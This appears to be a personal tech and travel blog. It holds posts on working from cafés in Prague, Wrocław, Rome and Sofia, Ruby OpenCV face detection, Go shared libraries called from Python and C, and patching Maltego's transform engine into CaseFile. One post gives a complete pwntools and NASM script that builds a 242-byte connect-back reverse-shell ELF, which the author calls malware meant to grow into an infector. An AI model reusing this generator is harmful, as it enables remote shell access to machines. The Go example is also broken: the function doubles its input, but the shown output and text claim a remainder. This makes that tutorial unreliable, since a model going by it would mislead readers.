PRAGUE/CZECH REPUBLIC as a DIGITAL NOMAD

My current stop is a city that everytime I step over, I love more: Prague, in Czech Republic! It’s, in my humble opinion, in the top 5 of most beautiful cities around the world and a good place to work. It’s cheap but not the cheapest in eastern europe, but you can live nicely here if you want. The traditional food is good, like goulash and things like that but don’t forget to try trdlnik, a bread-like thing toasted and mixed with sugar and cinamon! IMPORTANT!!!1!!ELEVEN!!: There is no tax over beer, which means that you can find 0.5L of local beer for 15 to 40 CZK(0.58 to 1.54 EUR)!!!!!

The first thing to notice is just like Wrocław, fast food is your friend: toilet, cheap friendly food and internet everytime! But you really can find wifi everywhere.
(when I say everywhere, I mean everywhere, like eating vietnamese phở)

For work, as I try to aways go for Cafés, I have two indications where not just the internet but the staff, quality of coffees was above the expectations and the environment was perfect to work: Chococafe and Friends Coffee House!

Chococafe looks like a granny house, is specialized in hot chocolat(even have brazilian cocoa to choose) and the staff is really amazing! Internet is around 40Mbps.

Friends Coffee House, in the other hand, looks like a modern space with internal coworking, Internet is around 40Mbps as well and coffee quality is great! It’s my personal choice!

Prague is awesome, beautiful, misterious and, despite the huge amount of tourists and people trying to sell drugs(which are decriminalized there), it’s a place to go whenever you can, enjoy the city, work over the castle at the Starbucks while looking at the city from above.

Some pictures of my wanderings around Prague:
1https://www.instagram.com/p/BkbMg3vjz9_/
2https://www.instagram.com/p/BkgbBqSjtws/
3https://www.instagram.com/p/Bkh9jpXDelg/

WROCŁAW/POLAND as a DIGITAL NOMAD

My current stop on my journey around the globe is Wrocław ( [ˈvrɔt͡swaf], ‘vrôtsuaf’ for porguese speakers ) in Poland, near Berlin (3:50h/20€ by PolskiBus/Flexibus), and it brings some good reasons for any digital nomad: low cost of living(due to low currency related to euro, złoty), central point in europe, ease to go by bus, train or airplane to everywhere, modern infrastructure, a lot of cafés and wifi everywhere.

There are a some coworking spaces around the city, due to startup scene but as I keep looking for cafés to work because it fit my needs.

I’ve been to some cafés and the one I liked most was Green Café Nero, which is part of a network of cafés. I’ve been on two of them: in Rynek(old town) and on a shopping connected to bus station and in both I had the same feeling: good internet (around 40Mbps, easily able to handle ssh+AWS console+Skype), power plugs, friendly staff, coffee is ok (a blend of african grains, toasted more the it suppose to be).

And well, I have two surprises here, in Rynek, fast food networks(McDonalds, Burger King and KFC) are open 24h and not just they have a good internet(!!!), but they provide tables and power plugs(!!!). In McDonalds right in front of city hall, the McCafe, on the underground, provides a coworking-like space, cozy, warm, with good internet and a coffee better then expected. It was my choice to work after a walk. But I saw a lot of people working on KFC after 2am! Crazy!

In the end, it is a cheap alternative to Berlin and a good place to rest a little before going somewhere more crazy/expensive/far!

Pictures of my wanderings around Wrocław(from last year, I forgot to take pictures this year lol)
1https://www.instagram.com/p/BSYGRYGh8LB/
2https://www.instagram.com/p/BSYSUBvBucG/
3https://www.instagram.com/p/BSYwTQqh34Z/

ROME/ITALY as a DIGITAL NOMAD

My current stop on this weird nomadic life is Rome, birth of Republic, home of Coloseum, Vatican city and a crazily overcrowded place! Rome is dirty, noisy and expensive, but is a place to go and understand the basis of western civilization. There is a growing startup moviment in rome since 2017 and it will be everytime more remote friendly but, you have pretty acceptable internet everywhere nowadays.

I haven’t even looked for coworking there, I worked on streets or bars, drinking some great capuccinos, and almost every bar/restaurant have good internet. As you can see in the picture below, I was working in front of pantheon, with a 40Mbps internet, solving some problems through ssh and python.

In Rome you can find great food(the roman plasta is amazing, amatriciana and carbonara are roman specials. And remember to drink wine from sicily, it’s delicious!) and the subway is kinda OK to use(cheap and easily inderstandable). Not the perfect place for a nomad as it is overcrowded and expensive but definitively a place to visit and stay for a while.

some pictures of my wandering around Rome:
1https://www.instagram.com/p/BjtFQ1rjWO0/
2https://www.instagram.com/p/Bj1aUwTjDZ5/

SOFIA/BULGARIA as a DIGITAL NOMAD

My current stop on my journey around the globe is Сoфия(SOFIA) in Bulgaria, the oldest European capital after Athens, brings some good reasons for any digital nomad: low cost of living, modern infrastructure, position outside the schengen zone, very unique soviet-ish atmosphere and wifi everywhere.

There are a lot of coworking spaces around the city, like betahaus and SOHO, but as I used to work on a café in Brazil (Amika, amazing place with 100MBps internet and power plugs), I looked for something familiar.

The place that I found and choosed to work in was Barista Coffee and More (https://www.baristacoffeesofia.com/). The place is awesome, very well-priced and well-located. You have a great variety of coffees (even a brazilian coffee, from south of Minas Gerais), confortable chairs, tables with power plugs and even a free-to-use printer!(where I even printed my boarding pass). Staff speaks english and there are always people with computers. The internet was open with SSID BaristaCoffee and download speed oscillating around 18Mbps. Enough for a skype call, SSH and AWS operation on the same time.

A quick history about internet on Sofia: I was eating on Happy Bar and Grill while a database problem occurred on my current job. The alarms started to ring and I just pulled my laptop from backpack, connected to local wifi, accessed SSH, veryfied the problem on logs, connected to AWS RDS interface and solved the problem, avoiding a major outage. All of that with open wifi from Happy Bar and Grill enjoying an amazing food!!

Sofia is amazing, there are a lot to see and definitivelly a city I would love to live!

Some pictures from my wanderings around Sofia:
1https://www.instagram.com/p/Bj5W5pjDEMT/
2https://www.instagram.com/p/Bj5ZQ9GDNYN/
3https://www.instagram.com/p/Bj5boAWjFKw/
4https://www.instagram.com/p/Bj-Uo3KjFAo/

Generating small elf binaries for fun and profit

The ideia was to code an ELF malware smaller then 1kb to insert it, encoded, inside a bacteriophage modded with CRISPR/Cas9 bringing an artistic view of a biologic infector containing a digital infector, an ode to singularity.

Well, to begin, we gonna use python’s pwntool to generate the base code. On linux, on my test box at digitalocean, I installed with pip. Then,

paolo@kabbalah:~$ python
Python 2.7.12 (default, Dec  4 2017, 14:50:18)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os, random, subprocess, string
>>> from pwn import *
>>>
>>> ipaddr = '127.0.0.1'
>>> port = 31337
>>> outfile = 'connectback'
>>>
>>> context(arch='x86_64')
>>>
>>> code = shellcraft.socket(network='ipv4', proto='tcp')
>>> code += shellcraft.connect(ipaddr, port, network='ipv4')
>>> code += shellcraft.dup2('rbp', 0)
>>> code += shellcraft.dup2('rbp', 1)
>>> code += shellcraft.dup2('rbp', 2)
>>> code += shellcraft.sh()
>>>
>>> elf = ELF.from_assembly(code)
[*] '/tmp/pwn-asm-nzvW_p/step3'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x10000000)
    RWX:      Has RWX segments
>>> elf.save('lnxmw1')
>>> quit()
paolo@kabbalah:~$ ls -alh lnxmw1
-rw-rw-r-- 1 paolo paolo 4.7K May  1 01:35 lnxmw1
paolo@kabbalah:~$ file lnxmw1
lnxmw1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
paolo@kabbalah:~$

As we could see, the binary was ok but was too big(4.7kb), we have to make it better, but first I want to install on my macbook. To install it on my OSX sierra was a little tricky as pip3 version was not working. I solved with:

$ python3 -m pip install git+https://github.com/arthaud/python3-pwntools.git

after installed, I also had to install nasm with brew install nasm. So, now I had a functional environment but the binary was still too big. Then, I start to look for some elf binary templates to hack into. After check /usr/include/elf.h, readelf and data from generated asm from pwn, I endded up with the following script:

import os, random, subprocess, string
from pwn import *
ipaddr = '127.0.0.1'
port = 31337
outfile = 'binarycrazyness'
context(arch='x86_64')
code = shellcraft.socket(network='ipv4', proto='tcp')
code += shellcraft.connect(ipaddr, port, network='ipv4')
code += shellcraft.dup2('rbp', 0)
code += shellcraft.dup2('rbp', 1)
code += shellcraft.dup2('rbp', 2)
code += shellcraft.sh()
defines=''
for sym in 'SYS_socket', 'SOCK_STREAM', 'SYS_connect', 'SYS_dup2', 'SYS_execve':
    defines += '%s equ %d\n' % (sym, getattr(constants, sym).real)
# for OSX don't have addressFamily.AF_INET (which is, for ipv4, 2) just set it here:
defines += 'AddressFamily.AF_INET equ 2\n'

nasm_code = ("""
BITS 64
  org 0x400000

ehdr:           ; Elf64_Ehdr
  db 0x7f, "ELF", 2, 1, 1, 0 ; e_ident
  times 8 db 0
  dw  2         ; e_type
  dw  0x3e      ; e_machine
  dd  1         ; e_version
  dq  _start    ; e_entry
  dq  phdr - $$ ; e_phoff
  dq  0         ; e_shoff
  dd  0         ; e_flags
  dw  ehdrsize  ; e_ehsize
  dw  phdrsize  ; e_phentsize
  dw  1         ; e_phnum
  dw  0         ; e_shentsize
  dw  0         ; e_shnum
  dw  0         ; e_shstrndx
  ehdrsize  equ  $ - ehdr

phdr:           ; Elf64_Phdr
  dd  1         ; p_type
  dd  5         ; p_flags
  dq  0         ; p_offset
  dq  $$        ; p_vaddr
  dq  $$        ; p_paddr
  dq  filesize  ; p_filesz
  dq  filesize  ; p_memsz
  dq  0x1000    ; p_align
  phdrsize  equ  $ - phdr

_start:
""" + defines
    + code.replace('/*', '; /*')
          .replace('dword ptr [', 'dword [')
    +
"""

filesize  equ  $ - $$
""")

with open('%s.asm' % "".join([random.choice(string.ascii_letters) for i in range(15)]), 'w') as f:
    f.write(nasm_code)
    f.flush()
    subprocess.Popen(['nasm', '-f', 'bin', '-o', outfile, f.name]).wait()
    os.remove(f.name)
    os.chmod(outfile, 0o0755)

Now, let’s run this file

paolo@daath ~/Workspace $ python3 gen.py
paolo@daath ~/Workspace $ ls -alH 
-rwxr-xr-x  1 paolo  staff  242 Apr 30 22:07 binarycrazyness
paolo@daath ~/Workspace $ file binarycrazyness
binarycrazyness: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, corrupted section header size
paolo@daath ~/Workspace $

this corrupted section header size exist due to the forced ASM.

To test, in a screen, run

$ nc -l 31337

and, on the other, run the binary. It’s beautiful and just 242 bytes!!!

Next steps are to use GETHOSTBYNAME and write an infector.

See you!

My first steps into Ruby and OpenCV(on OSX)

I was writing some robotic code that will run on a mac mini, so I tryied on my macbook for the first time, ruby binding to opencv. It was a weird experience lol.

First, to install OpenCV, brew do the job:

$ brew tap homebrew/science
$ brew install opencv

after a while we see that instalation goes flawlessly:
/usr/local/Cellar/opencv/2.4.13.2: 278 files, 35.6MB
and we have current version: 2.4.13.2. That said, now install ruby gem:

$ gem install ruby-opencv -- --with-opencv-lib=/usr/local/Cellar/opencv/2.4.13.2/lib \
                             --with-opencv-include=/usr/local/Cellar/opencv/2.4.13.2/include/opencv \
                             --with-opencv-include=/usr/local/Cellar/opencv/2.4.13.2/include/opencv2

Fetching: ruby-opencv-0.0.18.gem (100%)
Building native extensions with: '--with-opencv-lib=/usr/local/Cellar/opencv/2.4.13.2/lib --with-opencv-include=/usr/local/Cellar/opencv/2.4.13.2/include/opencv --with-opencv-include=/usr/local/Cellar/opencv/2.4.13.2/include/opencv2'
This could take a while...
Successfully installed ruby-opencv-0.0.18
Parsing documentation for ruby-opencv-0.0.18
Installing ri documentation for ruby-opencv-0.0.18
Done installing documentation for ruby-opencv after 7 seconds
1 gem installed

after that, time to code.

My first try, obviously, is to use HAAR cascade classifier to look for faces.

require "rubygems"
require "opencv"
include OpenCV

window = GUI::Window.new("grab da face!")
camera = CvCapture.open
detector = CvHaarClassifierCascade::load('./haarcascade_frontalface_alt.xml')
loop {
  image = camera.query
  detector.detect_objects(image).each { |rect|
    image.rectangle! rect.top_left, rect.bottom_right, :color => CvColor::Blue
  }
  window.show image
  break if GUI::wait_key(100)
}

It didn’t worked as ruby-opencv currently supports only older type format of trained data xml. To solve that, I grabed older version of haarcascade_frontalface_alt.xml from https://raw.githubusercontent.com/Itseez/opencv/2.4.10.4/data/haarcascades/haarcascade_frontalface_alt.xml and it worked as expected.
Sometimes, OSX Facetime camera stop working, but is easy to fix, just run

sudo killall VDCAssistant

wait a little and voilá.

In the end, was a different experience, it worked but was way too slow. I’ll try to tweak a little but python version are way faster and I believe I’ll keep using it.

Accessing Go compiled applications through FFI

I finally started to create some useful Go code and, just like some previous posts(in pt-BR, ) where I integrated python, lua and C, I would love to use them with old python code instead of C/C++. For that, I had to generate a shared library. The process is easy as expected, requiring only the import of library “C” and a comment before function definition, exporting the function name, as following examples.

package main

import "C"

//export ModXY
func ModXY(x int) int {
        return x * 2
}

func main() {}

Now, let’s compile it to generate a shared lib:

$ go build -o libmod.so -buildmode=c-shared

This results on two files, libmod.so and libmod.h where the first one is a shared library itself and the second one is the headers to include Go types into a C application. More on this soon. First let’s check libmod.so

$ file libmod.so
libmod.so: Mach-O 64-bit dynamically linked shared library x86_64

Nice, as expected on OSX. Now let’s try to import it with python ctypes!

Python 2.7.12 (default, Sep 28 2016, 18:41:32)
[GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.38)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import ctypes
>>> lib = ctypes.CDLL('libmod.so')
>>> lib.ModXY(13,2)
1

It worked like a charm! It is, actually, pretty easy to deal with. Now let’s find out the raison d’etre of this .h file. If, for some crazy reason, you need to embbed Go code inside a C file, simply include the .h and use the functions normally, as the following example:

#include <stdio.h>
#include "libmod.h"

int main(void){
  printf("the rest of division of 13 per 2 is %d", (int)ModXY(13,2));
  return 0;
}

then, compile it with:

$ gcc -o purexecutable testlib.c libmod.so 

and

$ file purexecutable
purexecutable: Mach-O 64-bit executable x86_64
$ ./purexecutable
the rest of division of 13 per 2 is 1

Yey! Again, simple and efficient. The design documentation of this feature may be found here( http://golang.org/s/execmodes ). That’s all

|   

Let it go? Let it go!

Lately, I added Go as one of my favourite programming languages and I’ve tried to rewrite e create new projects in Go. Basically, the reasons Go became one of my favourite languages is that, although the language/compiler/tools is opensource, different from a majority of opensource projects (JS mainly), it is backed up by a huge corporation (Google) and is easy to avoid major mess (hello JS, my old friend). Also, Go is fast (really, really fast), simple (like C, not like python), concurrent and cross-platform by design, what makes Go a great general pourpose language. If all these previous reasons don’t catch your heart, Go is designed by Rob Pike and Ken Thompson, the same guys who designed UNIX and C, so there is no way this would be bad (fanboy attack?). Another very specific issue I had with c++ and libboost: take 3-8 hours compiling libraries whose Go version took 5 seconds, made me embrace Go as a friend.

I saw Go, from very begining, as a “pythonic C” and, for a python guy’s perspective, I loved it. And, being able to handle binary data just like C but structured data just like python, made me fall in love.

In the end, I started to use Go as a main language, I hope to gain more wisdom on it and become a better Gopher.

|   

A study in software modification and automation by integrating Paterva’s CaseFile and Maltego

Maltego is an excellent intelligence and data visualization tool, but the need of being online(and the requirement of an registered account) make it pretty much useless for more sophisticated usages(like crime investigation or any other private and offline usage). For this, CaseFile was created, which is, basically, Maltego offline without the transforms. But transforms(offline and over closed-source data) would make the life of analysts easier in checking/validating information. To have the best of two worlds, I’ve extracted the transform engine from Maltego and inserted on CaseFile, also, removing the need of login and information leakage that the tool usually allow, making trustable and usable even by the government.

First, Maltego is a great tool and everyone who likes it should support Paterva and buy licenses. This is a study in software modification, automation and should not be used to cause harm to Paterva’s copyrights/busines model by any means. That’s why I’m using old versions of Maltego and Casefile.

The versions used was:

  • Maltego 3.1: maltego-3.1.1_CE-2012-04-11.zip md5 400b427652ca3e8ed60a6d6b7a457e81
  • CaseFile 1.0: maltego-CF.1.0.1_community-2012-03-14.zip md5 8d009eae5c899d74458712fe0e1458e1

They were originally downloaded from:

  • http://www.paterva.com/malv31/community/maltego-3.1.1_CE-2012-04-11.zip
  • http://www.paterva.com/cf10/community/maltego-CF.1.0.1_community-2012-03-14.zip

The base tools used was:

  • Jasmin ( http://jasmin.sourceforge.net/ ), an assembler for the Java Virtual Machine. It takes ASCII descriptions of Java classes, written in a simple assembler-like syntax using the Java Virtual Machine instruction set. It converts them into binary Java class files, suitable for loading by a Java runtime system.
  • ClassFileAnalyzer ( http://classfileanalyzer.javaseiten.de/ ), an analyzer and disassembler (Jasmin syntax 2) for Java class files.

First, I removed the annoying background image at maltego/modules/locale/com-paterva-maltego-ui-graph_maltego.jar.

Then, I’ve copied some files related to transform from Maltego to CaseFile:

  from maltego-ui/
    com-paterva-maltego-transforms-standard
    com-paterva-maltego-transform-protocol-v2
    com-paterva-maltego-transform-manager
    com-paterva-maltego-transform-finder     # needed by com-paterva-maltego-transform-manager
    com-paterva-maltego-transform-discovery  # needed by com-paterva-maltego-transform-protocol-v2
    com-paterva-maltego-transform-runner     # needed by com-paterva-maltego-transform-protocol-v2
  from maltego-core-platform/
    com-paterva-maltego-typing               # for com.paterva.maltego.typing.TypeNameValidator

The next step was define a series of modifications and fine tunning on CaseFile:

  • remove savetoserver and fake transform
  • remove startpage website
  • remove server discovery from manage transforms toolbar
  • always use trivialurldisplay
  • make showURL a stub in trivialurldisplay
  • remove google-me and wikipedia-me actions
  • remove all discover transforms actions
  • remove lots of webbrowser actions
  • enable transform limit toolbar

For that, I’ve put all modifications in .diff, .jdiff or .java where .diff is applied by standard POSIX patch utility, .jdiff is recompiled with jasmine and .java is compiled with jdk’s javac and integrated into target application.

Instructions:

  • Run cfpatch:
    ./cfpatch maltego-3.1.1_CE-2012-04-11.zip maltego-CF.1.0.1_community-2012-03-14.zip CF-custom.zip
  • Extact CF-custom.zip to the place where you want to install the custom CaseFile.

Extra
Create an .java file with the header:

//target-contains: com/paterva/maltego/graph/MaltegoGraph.class
//filename: org/hopto/im/Test.java

to integrate a new piece of software on Casefile. Example:

//target-contains: com/paterva/maltego/graph/MaltegoGraph.class
//filename: org/hopto/im/Test.java

// the above lines are to indicate that this class will be added
// in the same JAR module that file com/paterva/maltego/graph/MaltegoGraph.class
// and that the original name of this file is org/hopto/im/Test.java

package org.hopto.im;
public class Test {
    public static void main(String[] args) {
        System.out.println("Hello");
    }
}

All the working scripts and tools can be found at: https://github.com/paoloo/casefile-extender